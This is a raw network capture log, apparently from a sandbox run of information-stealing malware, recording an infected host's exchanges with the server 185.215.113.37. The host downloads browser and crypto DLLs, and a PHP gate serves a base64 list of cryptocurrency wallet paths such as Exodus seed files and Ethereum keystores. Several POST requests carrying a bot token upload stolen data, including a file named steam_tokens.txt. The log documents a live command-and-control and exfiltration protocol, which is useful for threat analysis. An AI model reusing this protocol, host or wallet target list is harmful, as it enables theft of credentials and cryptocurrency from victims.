Sep 26, 2024 21:14:13.185301065 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 21:14:14.034800053 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:14.273385048 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 21:14:14.696461916 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:14.926659107 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 21:14:15.314246893 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:15.543078899 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 21:14:17.032196045 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:17.270709991 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 21:14:17.563281059 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:17.791711092 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 21:14:18.355062962 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDGHIJDGCBAAAAAFIJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 21:14:19.474692106 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:19.537787914 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="message"wallets------HDBGDHDAECBGDHJKFIDG--
Sep 26, 2024 21:14:19.897078991 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:19 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 21:14:19.899755955 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"ybncbhylepme------CFHDHIJDGCBAKFIEGHCB--
Sep 26, 2024 21:14:20.149137974 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:20 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5801 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Sep 26, 2024 21:14:20.160268068 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file"------HIJEGIIJDGHDGCBGHCAA--
Sep 26, 2024 21:14:20.906302929 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:20.930515051 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="message"files------GHIJJEGDBFIIDGCAKJEB--
Sep 26, 2024 21:14:21.162516117 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:21.163558006 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 